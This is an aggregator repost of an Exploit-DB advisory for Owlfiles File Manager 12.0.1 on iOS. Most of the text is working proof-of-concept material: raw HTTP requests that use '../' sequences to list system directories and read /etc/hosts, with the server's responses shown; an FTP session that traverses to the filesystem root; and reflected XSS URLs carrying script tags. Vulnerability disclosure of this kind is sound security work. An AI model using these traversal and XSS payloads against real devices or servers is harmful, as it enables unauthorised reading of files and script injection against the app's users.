0
[webapps] Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities
source link: https://www.exploit-db.com/exploits/51036
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities
# Exploit Title: Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities
# Date: Sep 19, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.skyjos.com/
# Software Link:
https://apps.apple.com/us/app/owlfiles-file-manager/id510282524
# Version: 12.0.1
# Tested on: iPhone iOS 16.0
###########
path traversal on HTTP built-in server
###########
GET /../../../../../../../../../../../../../../../System/ HTTP/1.1
Host: localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e
Safari/8536.25
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
If-None-Match: 42638202/1663558201/177889085
If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMT
Connection: close
Content-Length: 0
-------
HTTP/1.1 200 OK
Cache-Control: max-age=3600, public
Content-Length: 317
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
Date: Mon, 19 Sep 2022 05:01:11 GMT
<!DOCTYPE html>
<html><head><meta charset="utf-8"></head><body>
<ul>
<li><a href="Cryptexes/">Cryptexes/</a></li>
<li><a href="DriverKit/">DriverKit/</a></li>
<li><a href="Library/">Library/</a></li>
<li><a href="Applications/">Applications/</a></li>
<li><a href="Developer/">Developer/</a></li>
</ul>
</body></html>
#############
LFI on HTTP built-in server
#############
GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: localhost:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e
Safari/8536.25
X-Requested-With: XMLHttpRequest
Referer: http://localhost:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
----
HTTP/1.1 200 OK
Connection: Close
Server: GCDWebUploader
Content-Type: application/octet-stream
Last-Modified: Sat, 03 Sep 2022 01:37:01 GMT
Date: Mon, 19 Sep 2022 03:28:14 GMT
Content-Length: 213
Cache-Control: max-age=3600, public
Etag: 1152921500312187994/1662169021/0
##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting. Do not change this entry.
##
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1 localhost
###############
path traversal on FTP built-in server
###############
ftp> cd ../../../../../../../../../
250 OK. Current directory is /../../../../../../../../../
ftp> ls
200 PORT command successful.
150 Accepted data connection
total 10
drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr
drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin
drwxr-xr-x 0 root wheel 608 Jan 01 1970 sbin
drwxr-xr-x 0 root wheel 224 Jan 01 1970 System
drwxr-xr-x 0 root wheel 640 Jan 01 1970 Library
drwxr-xr-x 0 root wheel 224 Jan 01 1970 private
drwxr-xr-x 0 root wheel 1131 Jan 01 1970 dev
drwxr-xr-x 0 root admin 4512 Jan 01 1970 Applications
drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer
drwxr-xr-x 0 root admin 64 Jan 01 1970 cores
WARNING! 10 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
ftp>
#############
XSS on HTTP built-in server
#############
poc 1:
http://localhost:8080/download?path=<script>alert(1)</script>
poc 2:
http://localhost:8080/list?path=<script>alert(1)</script>
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK